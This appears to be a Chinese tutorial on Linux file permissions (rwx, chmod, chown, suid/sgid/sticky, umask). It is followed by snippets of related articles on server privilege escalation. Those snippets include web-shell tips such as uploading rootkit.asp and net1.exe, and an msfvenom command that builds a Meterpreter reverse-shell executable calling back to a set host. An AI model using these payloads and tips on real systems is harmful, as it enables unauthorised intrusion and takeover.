文件权限以及提权

文件权限分基本权限和高级权限

基本权限:

权限主要是设置用户的权限

基本权限分三种:

r:读 可以读取文件的内容

w:写

x:执行

权限            对文件的影响                   对目录的影响

r:读        可以读取文件的内容       可以列出目录的内容(文件名)

w:写       可以更改文件的内容      可以创建或者删除目录中的任意一个文件

x:执行    可以作为命令执行文件   可以访问目录的内容(取决于目录中文件的权限)

x权限对文件是非常危险的;w权限对于目录来说是非常危险的

为什么x对于文件是非常危险的?因为:如果一个文件有x权限,就相当于把系统抛了一个接口给用户;用户没有权限没关系,只要有编译器可以往里面写代码 ;所以一般情况下文件是没有x权限的;意味着只能往文件里面写文本,就算写了代码,也认为是文本;x权限要针对目录就只能允许要进那个目录,没有别的作用

# ls -l         (ls   -l 查看属性)

总用量 0

-rw-r--r-- 1 root root 0 3月   2 03:09 test.txt

-           文件的类型(-:文本文件     d:目录   l:链接文件)

rw-r--r--        权限(前三个是所有者,指的是谁创建的这个文件,中间三个是所有组,意味着这组里面的用户,都这个文件有什么权限,后面三个叫其他用户,
1           引用次数(快捷方式数量)
root            所有者
root            所有组
0           文件的大小(1k为单位)
3月 2 03:09 文件的创建和最后修改时间

chown:更改文件的属主、属组(既可以改所有者,也可以改所有组)
# chown alice.hr file1 或者也可以写成# chown alice:hr file1//改属主、属组 ;那个除了点,冒号也可以
chgrp:专门改所有组的
-R:递归修改,就是把一个目录下的所有文件的属组和属主都改了

更改权限
使用字符
                对象  赋值符  权限类型
                u        +         r    u就是改前三个
chmod       g        -         w    g就是改中间三个
                o        =         x    o就是改后三个
                a
# chmod u+x file1     //属主增加执行
# chmod a=rwx file1     //所有人等于读写执行
# chmod a=- file1     //所有人没有权限
# chmod ug=rw,o=r file1     //属主属组等于读写,其他人只读
# ll file1      //以长模式方式查看文件权限
-rw-rw-r-- 1 alice it 17 10-25 16:45 file1  //显示的结果
数字
# chmod 644 file1
# ll file1
-rw-r--r-- 1 alice it 17 10-25 16:45 file1
切记:文件或者目录的权限限制对root用户限制无效,对所有人和其它人的限制有效,如果文件的权限只有读,那所有者可以读和强制写此文件

文件权限管理之二: 特殊权限

数值        作用                                文件                  目录

suid       4      给普通用户提权              可执行的二进制文件      没用

sgid       2      继承文件所属组                                             有用

sticky    1      仅允许删除自己的文件                                     有用

作用:
suid:  当一个文件具有SUID权限的时候,允许运行这个文件用户具有该文件的所有者权限!
当一个文件具有SUID权限的时候,允许这个用户运行文件的时候就意味着如果suid针对一个非可执行文件作用不大,没什么意义,只有用户在运行文件的时候才会产生变化,所谓的变化是具有所有者权限,如果是个普通
文件,没有可执行权限,不能被运行suid权限就没什么作用,当一个用户运行可执行权限文件的时候,具有所有者权限;我们会发现系统当中有很多存在这种矛盾的地方

# which passwd
/usr/bin/passwd
# ll /usr/bin/passwd

-rwsr-xr-x. 1 root root 30768 Feb 22  2012 /usr/bin/passwd--->这个文件的所有者本该是x,确是s,不是x就意味着该文件具有suid权限;用户借用suid的root权限来编辑

sgid:  允许在这个目录里之后创建的文件具有和这个目录相同所有组属性(继承所有组名称)
sgid和所有组有关,针对目录才有作用;作用是允许一个目录具有suid权限之后,这个目录里所有文件和目录都具有相同的所有组属性
粘滞位(o+t):只能删除自己创建的文件,别人的文件就算有权限粘滞位也不允许它删;粘滞位要求不管有没有权限,一旦一个目录有粘滞位,所有者能删,其他人都不行其他人都不行;它的作用就是例如是公共目录
上面的suid是最危险的;不到迫不得已不要用,什么是迫不得已?就是像passwd出现矛盾的地方

设置特殊权限
a、字符
chmod u+s file  (+suid)   chmod u-s file(-suid)
chmod g+s  dir  (+sgid)   chmod g-s file(-sgid)
chmod o+t  dir

b、数字

chmod 7777 file (4+2+1)777

chmod 2770 dir

chmod 3770 dir  (2+1)770

chmod 0770 dir 去除以上权限

文件权限管理之三: umask(用来指定系统的默认权限)

umask: 新建文件、目录的默认权限是由umask决定的

创建时默认权限满分:文件是666(没有x执行权限),目录777

root:   文件 644  umask: 0022

目录 755

普通用户:文件 664  umask: 0002

目录 775

[[email protected] ~]# umask     //查看当前用户的umask权限
0022
[[email protected] ~]# umask -S           //查看最终生效的权限(也称为mask值)
u=rwx,g=rx,o=rx

[[email protected] ~]# umask 000  //设置umask权限
[[email protected] ~]# umask
0000

算umask权限的时候不要用减法去算,因为算的不准

读,权限是二进制的100,十进制是4;

写,权限是二进制的010,十进制是2;

执行,权限是二进制的001,十进制是1;

具备多个权限,就把相应的 4、2、1 相加就可以了:

若要 rwx 则 4+2+1=7

若要 rw- 则 4+2=6

若要 r-x 则 4+1=5

若要 r-- 则 =4

若要 -wx 则 2+1=3

若要 -w- 则 =2

若要 --x 则 =1

若要 --- 则 =0

时间: 2024-08-05 01:10:52

文件权限以及提权的相关文章

Linux提权:从入门到放弃

日站就要日个彻底.往往我们能拿下服务器的web服务,却被更新地比西方记者还快的管理员把内网渗透的种子扼杀在提权的萌芽里面.Linux系统的提权过程不止涉及到了漏洞,也涉及了很多系统配置.一下是我总结的一些提权方法. 几点前提 已经拿到低权shell 被入侵的机器上面有nc,python,perl等linux非常常见的工具 有权限上传文件和下载文件 内核漏洞提权 提到脏牛,运维流下两行眼泪,我们留下两行鼻血.内核漏洞是我们几乎最先想到的提权方法.通杀的内核漏洞是十分少见的,因而我们应该先对系统相关

web提权笔记

[ web提权 ] 1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user 2.当提权成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp 用刚提权的用户登录进去就是system权限,再试试一般就可以了. 3.cmd拒绝访问的话就自己上传一个cmd.exe 自己上传的后缀是不限制后缀的,cmd.exe/cmd.com

提权系列(一)----Windows Service 服务器提权初识与exp提权,mysql提权

一.初识提权 很多时候我们入侵一个网站的时候,想要的是得到这个服务器的权限,也就是admin权限,但是一般默认得到的是普通用的地权限,权限很小,所以就要通过其他手段,提升自己的权限. 提权是将服务器的普通用户提升为管理员用户的一种操作,提权常常用于辅助旁注攻击. 下面我们来了解下window的权限(来自百度百科): Windows 提供了非常细致的权限控制项,能够精确定制用户对资源的访问控制能力,大多数的权限从其名称上就可以基本了解其所能实现的内容. " 权限"(Permission)

web提权思路

1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user 2.当提权成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp 用刚提权的用户登录进去就是system权限,再试试一般就可以了. 3.cmd拒绝访问的话就自己上传一个cmd.exe 自己上传的后缀是不限制后缀的,cmd.exe/cmd.com/cmd.txt 都

MYSQL提权的几种方式

MYSQL在windows和linux平台下存在几种不同的提权姿势,以下会做相关阐述,更多的是学习前辈的经验 Windows UDF提权 在windows下存在一个叫做动态链接库的东西,俗称DLL.该文件会把程序代码中使用的函数编译成机器码,保存在DLL文件中:在编译时,编译器不会把函数的机器码复制到可执行文件EXE中,而是在EXE执行文件中说明索要调用的函数在哪个DLL文件中,程序在执行时会自动从DLL文件中调用指定的函数 在不同的操作系统上,UDF提权的整体思路是一致的,只是函数调用的方式或

关于文件权限管理了解和使用

文件权限管理 文件属性格式 文件属性操作 chown          设置文件的所有者 chgrp          设置文件的属组信息 修改文件的属主: chown [选项] [所有者][:[组]] file 命令中的冒号可用.替换: -R :递归操作文件或目录 chown [选项] --reference=RFLE FILE -rw-r--r--. 1 root root    0 8月   3 18:17 xiaomage   这是没更改属主时候的文件 例如:~]# chown -R m

用MSF进行提权

在WEB渗透中当我们拿到webshell了,我们可以试试用MSF(metasploit)来进行提权,在MSF里meterpreter很强大的! 我们先用msfvenom生成一个EXE的木马后门. msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.1.7 LPORT=4444 -f exe > abc.exe 然后在到MSF根据刚才配置的木马后门进行监听...

Linux通过su、sudo命令实现用户切换、提权

概述 大多数Linux服务器并不建议用户直接以root用户进行登录.一方面可以大大减少因误操作而导致的破坏,另一方面也降低了特权密码在不安全的网络中被泄露的风险.鉴于这些原因,需要为普通用户提供一种身份切换或权限或权限提升机制,以便在必要的时候执行管理任务.此时就需要借助Linux为我们提供的su.sudo两种命令来提升执行权限. 提权配置的三种方式 1.针对用户 2.针对组 3.针对用户.组.命令的别名 实验目标 1.熟悉su.sudo的用法,熟练使用sudoers相关的配置 2.体验用户切换

Linux下更改文件权限以及系统权限预留阈值的设定

1 文件权限的理解文件权限读取 权限类型 - 权限关闭 r (resadable )查看权限 w (writeable)可写权力 x (excutable)执行权力 此位权限未开启 对于文件:可查看文件中的内容 对于目录:可列出目录中的文件名称 对于文件可更改文件记录的内容 对于目录可更改目录中文件的权限 对于文件可用文件名称调用文件内记录的程序 对于目录可进入目录 文件权限的设定方式 字符方式和数字方式 字符方式设定权限 chmod [参数]... 权限模式[权限模式]... 目标 数字方式设